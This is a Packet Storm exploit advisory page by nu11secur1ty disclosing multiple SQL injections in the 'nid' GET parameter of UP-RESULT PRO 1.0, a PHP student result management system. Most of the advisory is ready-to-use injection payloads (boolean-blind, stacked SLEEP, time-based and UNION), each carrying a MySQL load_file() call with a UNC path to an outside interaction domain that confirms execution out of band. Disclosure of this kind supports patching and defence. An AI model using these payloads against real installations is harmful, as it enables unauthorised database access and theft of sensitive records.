exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

UP-RESULT PRO 1.0 SQL Injection

UP-RESULT PRO 1.0 SQL Injection
Posted Oct 29, 2024
Authored by nu11secur1ty

UP-RESULT PRO version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | aa5fd3b33671b6f9535a4f177d74b5684187c6772a5f031c7ff6d6753fa030b6

UP-RESULT PRO 1.0 SQL Injection

Change Mirror Download
## Titles: UP-RESULT[pro-1.0] Multiple-SQLi
## Author: nu11secur1ty
## Date: 10/28/2024
## Vendor: https://mayurik.com/
## Software:
https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `nid` parameter appears to be vulnerable to SQL injection attacks. The
payload '+(select load_file('\\\\
p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+' was
submitted in the nid parameter. This payload injects a SQL sub-query that
calls MySQL's load_file function with a UNC file path that references a URL
on an external domain. The application interacted with that domain,
indicating that the injected SQL query was executed. The attacker can get
all sensitive information from this system when he attacks it online!

STATUS: HIGH- Vulnerability


[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: nid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: nid=2'+(select load_file('\\\\
p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' OR NOT
9142=9142 AND 'bbjg'='bbjg

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: nid=2'+(select load_file('\\\\
p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'';SELECT
SLEEP(7)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: nid=2'+(select load_file('\\\\
p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' AND
(SELECT 9083 FROM (SELECT(SLEEP(7)))YMvG) AND 'jiLE'='jiLE

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: nid=2'+(select load_file('\\\\
p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' UNION ALL
SELECT
NULL,CONCAT(0x7178767871,0x6467686f7670716c49467649584a4744416775554961485747416c4b724977454f75787267707268,0x7162627a71),NULL,NULL#
---
```

## Reproduce:
[href](https://www.patreon.com/posts/up-result-pro-1-114856979)

## Demo PoC:
[href](
https://www.nu11secur1ty.com/2024/10/up-resultpro-10-multiple-sqli.html)

## Time spent:
01:27:00


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    28 Files
  • 17
    Oct 17th
    23 Files
  • 18
    Oct 18th
    10 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    12 Files
  • 23
    Oct 23rd
    23 Files
  • 24
    Oct 24th
    8 Files
  • 25
    Oct 25th
    10 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    7 Files
  • 29
    Oct 29th
    17 Files
  • 30
    Oct 30th
    39 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close